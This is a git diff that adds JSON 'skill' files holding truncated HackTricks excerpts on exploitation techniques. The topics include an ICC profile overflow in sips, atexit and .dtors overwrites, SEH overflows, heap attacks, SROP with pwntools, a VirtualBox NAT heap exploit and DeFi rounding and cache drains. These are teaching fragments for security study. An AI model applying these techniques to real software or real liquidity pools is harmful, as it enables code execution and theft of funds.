+ "> Apple patched the bug in macOS Sonoma 15.2 / Ventura 14.7.1 (October 30, 2024). A second variant (CVE-2025-24185) was fixed in macOS 15.5 and iOS/iPadOS 18.5 on April 1, 2025.",
+ "## Vulnerable Code",
+ "// Pseudocode extracted from sub_1000194D0 in sips-307 (macOS 15.0.1)",
+ "if (offsetToCLUT <= tagDataSize) {",
+ "// BAD \u279c zero 16 bytes starting *at* offsetToCLUT",
+ "for (uint32_t i = offsetToCLUT; i < offsetToCLUT + 16; i++)",
+ "buffer[i] = 0; // no bounds check vs allocated size!",
+ "## Exploitation Steps",
+ "1. **Craft a malicious `.icc` profile**",
+ "* Set up a minimal ICC header (`acsp`) and add one `mAB ` (or `mBA `) tag.",
+ "* Configure the tag table so the **`offsetToCLUT` equals the tag size** (`tagDataSize`)."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/arbitrary-write-2-exec/aw2exec-sips-icc-profile.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_e635f161fea6.json b/skills/binary_exploitation_e635f161fea6.json
new file mode 100644
index 0000000..8fabd2d
--- /dev/null
+++ b/skills/binary_exploitation_e635f161fea6.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_e635f161fea6",
+ "category": "binary-exploitation",
+ "title": "www2exec atexit",
+ "description": "# WWW2Exec - atexit(), TLS Storage & Other mangled Pointers\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## **\\_\\_atexit Structures**\n\n> [!CAUTION]\n> Nowadays is very **weird to exploit this!**\n\n**`atexit()`** is a function to which **other functions are passed as parameters.** These **functions** will be **executed** when executing an **`exit()`** or the **return** of the **main**.\\\nIf you can **modify** the **address** of any of these **functions** to point to a shellcode for example, y",
+ "payloads": [
+ "# WWW2Exec - atexit(), TLS Storage & Other mangled Pointers",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## **\\_\\_atexit Structures**",
+ "> [!CAUTION]",
+ "> Nowadays is very **weird to exploit this!**",
+ "**`atexit()`** is a function to which **other functions are passed as parameters.** These **functions** will be **executed** when executing an **`exit()`** or the **return** of the **main**.\\",
+ "If you can **modify** the **address** of any of these **functions** to point to a shellcode for example, you will **gain control** of the **process**, but this is currently more complicated.\\",
+ "Currently the **addresses to the functions** to be executed are **hidden** behind several structures and finally the address to which it points are not the addresses of the functions, but are **encrypted with XOR** and displacements with a **random key**. So currently this attack vector is **not very useful at least on x86** and **x64_86**.\\",
+ "The **encryption function** is **`PTR_MANGLE`**. **Other architectures** such as m68k, mips32, mips64, aarch64, arm, hppa... **do not implement the encryption** function because it **returns the same** as it received as input. So these architectures would be attackable by this vector.",
+ "You can find an in depth explanation on how this works in [https://m101.github.io/binholic/2017/05/20/notes-on-abusing-exit-handlers.html](https://m101.github.io/binholic/2017/05/20/notes-on-abusing-exit-handlers.html)",
+ "## link_map",
+ "As explained [**in this post**](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md#2---targetting-ldso-link_map-structure), If the program exits using `return` or `exit()` it'll run `__run_exit_handlers()` which will call registered destructors.",
+ "> [!CAUTION]",
+ "> If the program exits via **`_exit()`** function, it'll call the **`exit` syscall** and the exit handlers will not be executed. So, to confirm `__run_exit_handlers()` is executed you can set a breakpoint on it.",
+ "The important code is ([source](https://elixir.bootlin.com/glibc/glibc-2.32/source/elf/dl-fini.c#L131)):"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/arbitrary-write-2-exec/www2exec-atexit.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_e6a70ef4d5be.json b/skills/binary_exploitation_e6a70ef4d5be.json
new file mode 100644
index 0000000..411527b
--- /dev/null
+++ b/skills/binary_exploitation_e6a70ef4d5be.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_e6a70ef4d5be",
+ "category": "binary-exploitation",
+ "title": "windows seh overflow",
+ "description": "# Windows SEH-based Stack Overflow Exploitation (nSEH/SEH)\n\n{{#include ../../banners/hacktricks-training.md}}\n\nSEH-based exploitation is a classic x86 Windows technique that abuses the Structured Exception Handler chain stored on the stack. When a stack buffer overflow overwrites the two 4-byte fields\n\n- nSEH: pointer to the next SEH record, and\n- SEH: pointer to the exception handler function\n\nan attacker can take control of execution by:\n\n1) Setting SEH to the address of a POP POP RET gadget i",
+ "payloads": [
+ "# Windows SEH-based Stack Overflow Exploitation (nSEH/SEH)",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "SEH-based exploitation is a classic x86 Windows technique that abuses the Structured Exception Handler chain stored on the stack. When a stack buffer overflow overwrites the two 4-byte fields",
+ "- nSEH: pointer to the next SEH record, and",
+ "- SEH: pointer to the exception handler function",
+ "an attacker can take control of execution by:",
+ "1) Setting SEH to the address of a POP POP RET gadget in a non-protected module, so that when an exception is dispatched the gadget returns into attacker-controlled bytes, and",
+ "2) Using nSEH to redirect execution (typically a short jump) back into the large overflowing buffer where shellcode resides.",
+ "This technique is specific to 32-bit processes (x86). On modern systems, prefer a module without SafeSEH and ASLR for the gadget. Bad characters often include 0x00, 0x0a, 0x0d (NUL/CR/LF) due to C-strings and HTTP parsing.",
+ "## Finding exact offsets (nSEH / SEH)",
+ "- Crash the process and verify the SEH chain is overwritten (e.g., in x32dbg/x64dbg, check the SEH view).",
+ "- Send a cyclic pattern as the overflowing data and compute offsets of the two dwords that land in nSEH and SEH.",
+ "Example with peda/GEF/pwntools on a 1000-byte POST body:",
+ "```bash",
+ "# generate pattern (any tool is fine)"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/stack-overflow/windows-seh-overflow.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_e7437f4ee973.json b/skills/binary_exploitation_e7437f4ee973.json
new file mode 100644
index 0000000..ff6d714
--- /dev/null
+++ b/skills/binary_exploitation_e7437f4ee973.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_e7437f4ee973",
+ "category": "binary-exploitation",
+ "title": "ios example heap exploit",
+ "description": "# iOS How to Connect to Corellium\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Vuln Code\n\n```c\n#define _GNU_SOURCE\n#include \n#include \n#include \n#include \n\n__attribute__((noinline))\nstatic void safe_cb(void) {\n puts(\"[*] safe_cb() called \u2014 nothing interesting here.\");\n}\n\n__attribute__((noinline))\nstatic void win(void) {\n puts(\"[+] win() reached \u2014 spawning shell...\");\n fflush(stdout);\n system(\"/bin/sh\");\n exit(0);\n}\n\ntypedef void (*c",
+ "payloads": [
+ "# iOS How to Connect to Corellium",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Vuln Code",
+ "#define _GNU_SOURCE",
+ "#include ",
+ "#include ",
+ "#include ",
+ "#include ",
+ "__attribute__((noinline))",
+ "static void safe_cb(void) {",
+ "puts(\"[*] safe_cb() called \u2014 nothing interesting here.\");",
+ "__attribute__((noinline))",
+ "static void win(void) {",
+ "puts(\"[+] win() reached \u2014 spawning shell...\");",
+ "fflush(stdout);"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/ios-exploiting/ios-example-heap-exploit.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_e84bfda23670.json b/skills/binary_exploitation_e84bfda23670.json
new file mode 100644
index 0000000..348eccf
--- /dev/null
+++ b/skills/binary_exploitation_e84bfda23670.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_e84bfda23670",
+ "category": "binary-exploitation",
+ "title": "free",
+ "description": "# free\n\n{{#include ../../../banners/hacktricks-training.md}}\n\n## Free Order Summary \n\n(No checks are explained in this summary and some case have been omitted for brevity)\n\n1. If the address is null don't do anything\n2. If the chunk was mmaped, munmap it and finish\n3. Call `_int_free`:\n 1. If possible, add the chunk to the tcache\n 2. If possible, add the chunk to the fast bin\n 3. Call `_int_free_merge_chunk` to consolidate the chunk is needed and add",
+ "payloads": [
+ "# free",
+ "{{#include ../../../banners/hacktricks-training.md}}",
+ "## Free Order Summary ",
+ "(No checks are explained in this summary and some case have been omitted for brevity)",
+ "1. If the address is null don't do anything",
+ "2. If the chunk was mmaped, munmap it and finish",
+ "3. Call `_int_free`:",
+ "1. If possible, add the chunk to the tcache",
+ "2. If possible, add the chunk to the fast bin",
+ "3. Call `_int_free_merge_chunk` to consolidate the chunk is needed and add it to the unsorted list",
+ "> Note: Starting with glibc 2.42, the tcache step can also take chunks up to a much larger size threshold (see \u201cRecent glibc changes\u201d below). This changes when a free lands in tcache vs. unsorted/small/large bins.",
+ "## __libc_free ",
+ "`Free` calls `__libc_free`.",
+ "- If the address passed is Null (0) don't do anything.",
+ "- Check pointer tag"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/libc-heap/heap-memory-functions/free.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_e8548eda25c7.json b/skills/binary_exploitation_e8548eda25c7.json
new file mode 100644
index 0000000..c7bb2f1
--- /dev/null
+++ b/skills/binary_exploitation_e8548eda25c7.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_e8548eda25c7",
+ "category": "binary-exploitation",
+ "title": "bypassing canary and pie",
+ "description": "# BF Addresses in the Stack\n\n{{#include ../../../banners/hacktricks-training.md}}\n\n**If you are facing a binary protected by a canary and PIE (Position Independent Executable) you probably need to find a way to bypass them.**\n\n.png>)\n\n> [!TIP]\n> Note that **`checksec`** might not find that a binary is protected by a canary if this was statically compiled and it's not capable to identify the function.\\\n> However, you can manually notice this if you find that a valu",
+ "payloads": [
+ "# BF Addresses in the Stack",
+ "{{#include ../../../banners/hacktricks-training.md}}",
+ "**If you are facing a binary protected by a canary and PIE (Position Independent Executable) you probably need to find a way to bypass them.**",
+ ".png>)",
+ "> [!TIP]",
+ "> Note that **`checksec`** might not find that a binary is protected by a canary if this was statically compiled and it's not capable to identify the function.\\",
+ "> However, you can manually notice this if you find that a value is saved in the stack at the beginning of a function call and this value is checked before exiting.",
+ "## Brute-Force Addresses",
+ "In order to **bypass the PIE** you need to **leak some address**. And if the binary is not leaking any addresses the best to do it is to **brute-force the RBP and RIP saved in the stack** in the vulnerable function.\\",
+ "For example, if a binary is protected using both a **canary** and **PIE**, you can start brute-forcing the canary, then the **next** 8 Bytes (x64) will be the saved **RBP** and the **next** 8 Bytes will be the saved **RIP.**",
+ "> [!TIP]",
+ "> It's supposed that the return address inside the stack belongs to the main binary code, which, if the vulnerability is located in the binary code, will usually be the case.",
+ "To brute-force the RBP and the RIP from the binary you can figure out that a valid guessed byte is correct if the program output something or it just doesn't crash. The **same function** as the provided for brute-forcing the canary can be used to brute-force the RBP and the RIP:",
+ "```python",
+ "from pwn import *"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/common-binary-protections-and-bypasses/pie/bypassing-canary-and-pie.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_e9eb320fd581.json b/skills/binary_exploitation_e9eb320fd581.json
new file mode 100644
index 0000000..f4772d6
--- /dev/null
+++ b/skills/binary_exploitation_e9eb320fd581.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_e9eb320fd581",
+ "category": "binary-exploitation",
+ "title": "house of orange",
+ "description": "# House of Orange\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Basic Information\n\n### Code\n\n- Find an example in [https://github.com/shellphish/how2heap/blob/master/glibc_2.23/house_of_orange.c](https://github.com/shellphish/how2heap/blob/master/glibc_2.23/house_of_orange.c)\n - The exploitation technique was fixed in this [patch](https://sourceware.org/git/?p=glibc.git;a=blobdiff;f=stdlib/abort.c;h=117a507ff88d862445551f2c07abb6e45a716b75;hp=19882f3e3dc1ab830431506329c94dcf1d7cc252;hb",
+ "payloads": [
+ "# House of Orange",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "### Code",
+ "- Find an example in [https://github.com/shellphish/how2heap/blob/master/glibc_2.23/house_of_orange.c](https://github.com/shellphish/how2heap/blob/master/glibc_2.23/house_of_orange.c)",
+ "- The exploitation technique was fixed in this [patch](https://sourceware.org/git/?p=glibc.git;a=blobdiff;f=stdlib/abort.c;h=117a507ff88d862445551f2c07abb6e45a716b75;hp=19882f3e3dc1ab830431506329c94dcf1d7cc252;hb=91e7cf982d0104f0e71770f5ae8e3faf352dea9f;hpb=0c25125780083cbba22ed627756548efe282d1a0) so this is no longer working (working in earlier than 2.26)",
+ "- Same example **with more comments** in [https://guyinatuxedo.github.io/43-house_of_orange/house_orange_exp/index.html](https://guyinatuxedo.github.io/43-house_of_orange/house_orange_exp/index.html)",
+ "### Goal",
+ "- Abuse `malloc_printerr` function",
+ "### Requirements",
+ "- Overwrite the top chunk size",
+ "- Libc and heap leaks",
+ "### Background",
+ "Some needed background from the comments from [**this example**](https://guyinatuxedo.github.io/43-house_of_orange/house_orange_exp/index.html)**:**",
+ "Thing is, in older versions of libc, when the `malloc_printerr` function was called it would **iterate through a list of `_IO_FILE` structs stored in `_IO_list_all`**, and actually **execute** an instruction pointer in that struct.\\"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/libc-heap/house-of-orange.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_ecc77f30d312.json b/skills/binary_exploitation_ecc77f30d312.json
new file mode 100644
index 0000000..854ba97
--- /dev/null
+++ b/skills/binary_exploitation_ecc77f30d312.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_ecc77f30d312",
+ "category": "binary-exploitation",
+ "title": "stack shellcode arm64",
+ "description": "# Stack Shellcode - arm64\n\n{{#include ../../../banners/hacktricks-training.md}}\n\nFind an introduction to arm64 in:\n\n{{#ref}}\n../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md\n{{#endref}}\n\n## Linux\n\n### Code\n\n```c\n#include \n#include \n\nvoid vulnerable_function() {\n char buffer[64];\n read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability\n}\n\nint main() {\n vulnerable_function();\n retur",
+ "payloads": [
+ "# Stack Shellcode - arm64",
+ "{{#include ../../../banners/hacktricks-training.md}}",
+ "Find an introduction to arm64 in:",
+ "{{#ref}}",
+ "../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md",
+ "{{#endref}}",
+ "## Linux",
+ "### Code",
+ "#include ",
+ "#include ",
+ "void vulnerable_function() {",
+ "char buffer[64];",
+ "read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability",
+ "int main() {",
+ "vulnerable_function();"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/stack-overflow/stack-shellcode/stack-shellcode-arm64.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_ece2ad6cfa19.json b/skills/binary_exploitation_ece2ad6cfa19.json
new file mode 100644
index 0000000..67c58c7
--- /dev/null
+++ b/skills/binary_exploitation_ece2ad6cfa19.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_ece2ad6cfa19",
+ "category": "binary-exploitation",
+ "title": "virtualbox slirp nat packet heap exploitation",
+ "description": "# VirtualBox Slirp NAT Packet Heap Exploitation\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## TL;DR\n\n- VirtualBox ships a heavily modified fork of Slirp whose packet buffers (mbufs) live in a custom zone allocator with inline metadata and function-pointer callbacks (`pfFini`, `pfDtor`).\n- A guest can rewrite the trusted `m->m_len` with an attacker-controlled IP header length, which destroys all later bounds checks and yields both infoleak and overwrite primitives.\n- By abusing UDP packe",
+ "payloads": [
+ "# VirtualBox Slirp NAT Packet Heap Exploitation",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## TL;DR",
+ "- VirtualBox ships a heavily modified fork of Slirp whose packet buffers (mbufs) live in a custom zone allocator with inline metadata and function-pointer callbacks (`pfFini`, `pfDtor`).",
+ "- A guest can rewrite the trusted `m->m_len` with an attacker-controlled IP header length, which destroys all later bounds checks and yields both infoleak and overwrite primitives.",
+ "- By abusing UDP packets with checksum `0` and oversized `ip_len`, the guest can exfiltrate mbuf tails and the metadata of neighbouring chunks to learn heap and zone addresses.",
+ "- Providing crafted IP options forces `ip_stripoptions()` to `memcpy()` too much data in-place, so the attacker can overwrite the next mbuf's `struct item` header and point its `zone` field at fully controlled data.",
+ "- Freeing the corrupted mbuf triggers `zone->pfFini()` with attacker-supplied arguments; pointing it to `memcpy@plt` gives an arbitrary copy/write primitive that can be steered toward GOT entries or other control data inside the non-PIE VirtualBox binary.",
+ "## Packet allocator anatomy",
+ "VirtualBox allocates every ingress Ethernet frame from a per-interface zone named `zone_clust`. Each 0x800-byte data chunk is preceded by an inline header:",
+ "struct item {",
+ "uint32_t magic; // 0xdead0001",
+ "void *zone; // uma_zone_t pointer with callbacks",
+ "uint32_t ref_count;",
+ "LIST_ENTRY(item) list; // freelist / used list links"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/libc-heap/virtualbox-slirp-nat-packet-heap-exploitation.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_ecfcf23dd679.json b/skills/binary_exploitation_ecfcf23dd679.json
new file mode 100644
index 0000000..9e08192
--- /dev/null
+++ b/skills/binary_exploitation_ecfcf23dd679.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_ecfcf23dd679",
+ "category": "binary-exploitation",
+ "title": "unsorted bin attack",
+ "description": "# Unsorted Bin Attack\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Basic Information\n\nFor more information about what is an unsorted bin check this page:\n\n\n{{#ref}}\nbins-and-memory-allocations.md\n{{#endref}}\n\nUnsorted lists are able to write the address to `unsorted_chunks (av)` in the `bk` address of the chunk. Therefore, if an attacker can **modify the address of the `bk` pointer** in a chunk inside the unsorted bin, he could be able to **write that address in an arbitrary address** ",
+ "payloads": [
+ "# Unsorted Bin Attack",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Basic Information",
+ "For more information about what is an unsorted bin check this page:",
+ "{{#ref}}",
+ "bins-and-memory-allocations.md",
+ "{{#endref}}",
+ "Unsorted lists are able to write the address to `unsorted_chunks (av)` in the `bk` address of the chunk. Therefore, if an attacker can **modify the address of the `bk` pointer** in a chunk inside the unsorted bin, he could be able to **write that address in an arbitrary address** which could be helpful to leak a Glibc addresses or bypass some defense.",
+ "So, basically, this attack allows to **set a big number at an arbitrary address**. This big number is an address, which could be a heap address or a Glibc address. A traditional target was **`global_max_fast`** to allow to create fast bin bins with bigger sizes (and pass from an unsorted bin attack to a fast bin attack).",
+ "- Modern note (glibc \u2265 2.39): `global_max_fast` became an 8\u2011bit global. Blindly writing a pointer there via an unsorted-bin write will clobber adjacent libc data and will not reliably raise the fastbin limit anymore. Prefer other targets or other primitives when running against glibc 2.39+. See \"Modern constraints\" below and consider combining with other techniques like a [large bin attack](large-bin-attack.md) or a [fast bin attack](fast-bin-attack.md) once you have a stable primitive.",
+ "> [!TIP]",
+ "> T> aking a look to the example provided in [https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/unsorted_bin_attack/#principle](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/unsorted_bin_attack/#principle) and using 0x4000 and 0x5000 instead of 0x400 and 0x500 as chunk sizes (to avoid Tcache) it's possible to see that **nowadays** the error **`malloc(): unsorted double linked list corrupted`** is triggered.",
+ "> Therefore, this unsorted bin attack now (among other checks) also requires to be able to fix the doubled linked list so this is bypassed `victim->bk->fd == victim` or not `victim->fd == av (arena)`, which means that the address where we want to write must have the address of the fake chunk in its `fd` position and that the fake chunk `fd` is pointing to the arena.",
+ "> [!CAUTION]",
+ "> Note that this attack corrupts the unsorted bin (hence small and large too). So we can only **use allocations from the fast bin now** (a more complex program might do other allocations and crash), and to trigger this we must **allocate the same size or the program will crash.**"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/libc-heap/unsorted-bin-attack.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_ed8c1f5a3359.json b/skills/binary_exploitation_ed8c1f5a3359.json
new file mode 100644
index 0000000..d286fc5
--- /dev/null
+++ b/skills/binary_exploitation_ed8c1f5a3359.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_ed8c1f5a3359",
+ "category": "binary-exploitation",
+ "title": "srop arm64",
+ "description": "# {{#include ../../../banners/hacktricks-training.md}}\n\n{{#include ../../../banners/hacktricks-training.md}}\n\n## Pwntools example\n\nThis example is creating the vulnerable binary and exploiting it. The binary **reads into the stack** and then calls **`sigreturn`**:\n\n```python\nfrom pwn import *\n\nbinsh = \"/bin/sh\"\ncontext.clear()\ncontext.arch = \"arm64\"\n\nasm = ''\nasm += 'sub sp, sp, 0x1000\\n'\nasm += shellcraft.read(constants.STDIN_FILENO, 'sp', 1024) #Read into the stack\nasm += shellcraft.sigreturn(",
+ "payloads": [
+ "# {{#include ../../../banners/hacktricks-training.md}}",
+ "{{#include ../../../banners/hacktricks-training.md}}",
+ "## Pwntools example",
+ "This example is creating the vulnerable binary and exploiting it. The binary **reads into the stack** and then calls **`sigreturn`**:",
+ "```python",
+ "from pwn import *",
+ "binsh = \"/bin/sh\"",
+ "context.clear()",
+ "context.arch = \"arm64\"",
+ "asm = ''",
+ "asm += 'sub sp, sp, 0x1000\\n'",
+ "asm += shellcraft.read(constants.STDIN_FILENO, 'sp', 1024) #Read into the stack",
+ "asm += shellcraft.sigreturn() # Call sigreturn",
+ "asm += 'syscall: \\n' #Easy symbol to use in the exploit",
+ "asm += shellcraft.syscall()"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/rop-return-oriented-programing/srop-sigreturn-oriented-programming/srop-arm64.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/binary_exploitation_f8f3cccfcb9c.json b/skills/binary_exploitation_f8f3cccfcb9c.json
new file mode 100644
index 0000000..b628656
--- /dev/null
+++ b/skills/binary_exploitation_f8f3cccfcb9c.json
@@ -0,0 +1,27 @@
+{
+ "id": "binary_exploitation_f8f3cccfcb9c",
+ "category": "binary-exploitation",
+ "title": "www2exec .dtors and .fini array",
+ "description": "# WWW2Exec - .dtors & .fini_array\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## .dtors\n\n> [!CAUTION]\n> Nowadays is very **weird to find a binary with a .dtors section!**\n\nThe destructors are functions that are **executed before program finishes** (after the `main` function returns).\\\nThe addresses to these functions are stored inside the **`.dtors`** section of the binary and therefore, if you manage to **write** the **address** to a **shellcode** in **`__DTOR_END__`** , that will be **",
+ "payloads": [
+ "# WWW2Exec - .dtors & .fini_array",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## .dtors",
+ "> [!CAUTION]",
+ "> Nowadays is very **weird to find a binary with a .dtors section!**",
+ "The destructors are functions that are **executed before program finishes** (after the `main` function returns).\\",
+ "The addresses to these functions are stored inside the **`.dtors`** section of the binary and therefore, if you manage to **write** the **address** to a **shellcode** in **`__DTOR_END__`** , that will be **executed** before the programs ends.",
+ "Get the address of this section with:",
+ "```bash",
+ "objdump -s -j .dtors /exec",
+ "rabin -s /exec | grep \u201c__DTOR\u201d",
+ "Usually you will find the **DTOR** markers **between** the values `ffffffff` and `00000000`. So if you just see those values, it means that there **isn't any function registered**. So **overwrite** the **`00000000`** with the **address** to the **shellcode** to execute it.",
+ "> [!WARNING]",
+ "> Ofc, you first need to find a **place to store the shellcode** in order to later call it.",
+ "## **.fini_array**"
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/binary-exploitation/arbitrary-write-2-exec/www2exec-.dtors-and-.fini_array.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/blockchain_019ec0a305b6.json b/skills/blockchain_019ec0a305b6.json
new file mode 100644
index 0000000..25a9083
--- /dev/null
+++ b/skills/blockchain_019ec0a305b6.json
@@ -0,0 +1,27 @@
+{
+ "id": "blockchain_019ec0a305b6",
+ "category": "blockchain",
+ "title": "defi amm hook precision",
+ "description": "# DeFi/AMM Exploitation: Uniswap v4 Hook Precision/Rounding Abuse\n\n{{#include ../../banners/hacktricks-training.md}}\n\nThis page documents a class of DeFi/AMM exploitation techniques against Uniswap v4\u2013style DEXes that extend core math with custom hooks. A recent incident in Bunni V2 leveraged a rounding/precision flaw in a Liquidity Distribution Function (LDF) executed on each swap, enabling the attacker to accrue positive credits and drain liquidity.\n\nKey idea: if a hook implements additional a",
+ "payloads": [
+ "# DeFi/AMM Exploitation: Uniswap v4 Hook Precision/Rounding Abuse",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "This page documents a class of DeFi/AMM exploitation techniques against Uniswap v4\u2013style DEXes that extend core math with custom hooks. A recent incident in Bunni V2 leveraged a rounding/precision flaw in a Liquidity Distribution Function (LDF) executed on each swap, enabling the attacker to accrue positive credits and drain liquidity.",
+ "Key idea: if a hook implements additional accounting that depends on fixed\u2011point math, tick rounding, and threshold logic, an attacker can craft exact\u2011input swaps that cross specific thresholds so that rounding discrepancies accumulate in their favor. Repeating the pattern and then withdrawing the inflated balance realizes profit, often financed with a flash loan.",
+ "## Background: Uniswap v4 hooks and swap flow",
+ "- Hooks are contracts that the PoolManager calls at specific lifecycle points (e.g., beforeSwap/afterSwap, beforeAddLiquidity/afterAddLiquidity, beforeRemoveLiquidity/afterRemoveLiquidity).",
+ "- Pools are initialized with a PoolKey including hooks address. If non\u2011zero, PoolManager performs callbacks on every relevant operation.",
+ "- Core math uses fixed\u2011point formats such as Q64.96 for sqrtPriceX96 and tick arithmetic with 1.0001^tick. Any custom math layered on top must carefully match rounding semantics to avoid invariant drift.",
+ "- Swaps can be exactInput or exactOutput. In v3/v4, price moves along ticks; crossing a tick boundary may activate/deactivate range liquidity. Hooks may implement extra logic on threshold/tick crossings.",
+ "## Vulnerability archetype: threshold\u2011crossing precision/rounding drift",
+ "A typical vulnerable pattern in custom hooks:",
+ "1. The hook computes per\u2011swap liquidity or balance deltas using integer division, mulDiv, or fixed\u2011point conversions (e.g., token \u2194 liquidity using sqrtPrice and tick ranges).",
+ "2. Threshold logic (e.g., rebalancing, stepwise redistribution, or per\u2011range activation) is triggered when a swap size or price movement crosses an internal boundary.",
+ "3. Rounding is applied inconsistently (e.g., truncation toward zero, floor versus ceil) between the forward calculation and the settlement path. Small discrepancies don\u2019t cancel and instead credit the caller.",
+ "4. Exact\u2011input swaps, precisely sized to straddle those boundaries, repeatedly harvest the positive rounding remainder. The attacker later withdraws the accumulated credit."
+ ],
+ "source": "HackTricks",
+ "references": [
+ "/workspaces/hunter-skill/hacktricks/src/blockchain/blockchain-and-crypto-currencies/defi-amm-hook-precision.md"
+ ]
+}
\ No newline at end of file
diff --git a/skills/blockchain_0c584fe7e269.json b/skills/blockchain_0c584fe7e269.json
new file mode 100644
index 0000000..39a9a59
--- /dev/null
+++ b/skills/blockchain_0c584fe7e269.json
@@ -0,0 +1,27 @@
+{
+ "id": "blockchain_0c584fe7e269",
+ "category": "blockchain",
+ "title": "defi amm virtual balance cache exploitation",
+ "description": "# DeFi AMM Accounting Bugs & Virtual Balance Cache Exploitation\n\n{{#include ../../banners/hacktricks-training.md}}\n\n## Overview\n\nYearn Finance's yETH pool (Nov 2025) exposed how gas-saving caches inside complex AMMs can be weaponized when they are not reconciled during boundary-state transitions. The weighted stableswap pool tracks up to 32 liquid staking derivatives (LSDs), converts them to ETH-equivalent **virtual balances** (`vb_i = balance_i \u00d7 rate_i / PRECISION`), and stores those values in",
+ "payloads": [
+ "# DeFi AMM Accounting Bugs & Virtual Balance Cache Exploitation",
+ "{{#include ../../banners/hacktricks-training.md}}",
+ "## Overview",
+ "Yearn Finance's yETH pool (Nov 2025) exposed how gas-saving caches inside complex AMMs can be weaponized when they are not reconciled during boundary-state transitions. The weighted stableswap pool tracks up to 32 liquid staking derivatives (LSDs), converts them to ETH-equivalent **virtual balances** (`vb_i = balance_i \u00d7 rate_i / PRECISION`), and stores those values in a packed storage array `packed_vbs[]`. When **all LP tokens are burned**, `totalSupply` correctly drops to zero but the cached `packed_vbs[i]` slots retained huge historic values. The subsequent depositor was treated as the \"first\" liquidity provider even though the cache still held phantom liquidity, letting an attacker mint ~235 septillion yETH for only **16 wei** before draining \u2248USD 9M in LSD collateral.",
+ "Key ingredients:",
+ "- **Derived-state caching**: expensive oracle lookups are avoided by persisting virtual balances and incrementally updating them.",
+ "- **Missing reset when `supply == 0`**: `remove_liquidity()` proportional decrements left non-zero residues in `packed_vbs[]` after each withdrawal cycle.",
+ "- **Initialization branch trusts the cache**: `add_liquidity()` calls `_calc_vb_prod_sum()` and simply **reads** `packed_vbs[]` when `prev_supply == 0`, assuming the cache is also zeroed.",
+ "- **Flash-loan financed state poisoning**: deposit/withdraw loops amplified rounding residues with no capital lockup, enabling a catastrophic over-mint in the \"first deposit\" path.",
+ "## Cache design & missing boundary handling",
+ "The vulnerable flow is simplified below:",
+ "```solidity",
+ "function remove_liquidity(uint256 burnAmount) external {",
+ "uint256 supplyBefore = totalSupply();",
+ "_burn(msg.sender, burnAmount);"
+ ],
+ "source": "HackTricks",
+ "references": [
